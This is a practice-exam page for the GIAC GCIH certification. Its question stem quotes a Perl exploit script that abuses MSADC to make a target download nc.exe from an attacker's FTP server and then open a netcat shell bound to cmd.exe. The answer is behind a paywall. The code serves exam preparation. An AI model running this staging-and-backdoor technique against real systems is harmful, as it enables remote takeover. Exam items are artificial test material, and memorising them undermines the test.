nerdexam
GIAC

GCIH · Question #278

Adam, a malicious hacker performs an exploit, which is given below: ##################################################### $port = 53; # Spawn cmd.exe on port X $your = "192.168.1.1";# Your FTP Server

Sign in or unlock GCIH to reveal the answer and full explanation for question #278. The question stem and answer options stay visible for context.

Vulnerability Exploitation & Privilege Escalation

Question

Adam, a malicious hacker performs an exploit, which is given below:

##################################################### $port = 53; # Spawn cmd.exe on port X $your = "192.168.1.1";# Your FTP Server 89 $user = "Anonymous";# login as $pass = '[email protected]';# password ##################################################### $host = $ARGV[0]; print "Starting ...\n"; print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C "echo open $your >sasfile""); system("perl msadc.pl -h $host -C "echo $user>>sasfile""); system("perl msadc.pl -h $host -C "echo $pass>>sasfile""); system("perl msadc.pl -h $host -C "echo bin>>sasfile""); system("perl msadc.pl -h $host -C "echo get nc.exe>>sasfile""); system("perl msadc.pl -h $host -C "echo get hacked. html>>sasfile""); system("perl msadc.pl -h $host -C "echo quit>>sasfile""); print "Server is downloading ... \n"; system("perl msadc.pl -h $host -C "ftp -s:sasfile""); print "Press ENTER when download is finished ... (Have a ftp server)\n"; $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe""); print "Done.\n"; #system("telnet $host $port"); exit(0); Which of the following is the expected result of the above exploit?

Options

  • ACreates a share called "sasfile" on the target system
  • BCreates an FTP server with write permissions enabled
  • COpens up a SMTP server that requires no username or password
  • DOpens up a telnet listener that requires no username or password

Unlock GCIH to see the answer

You've previewed enough free GCIH questions. Unlock GCIH for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.

Topics

#MSADC exploit#remote code execution#netcat backdoor#FTP staging
Full GCIH Practice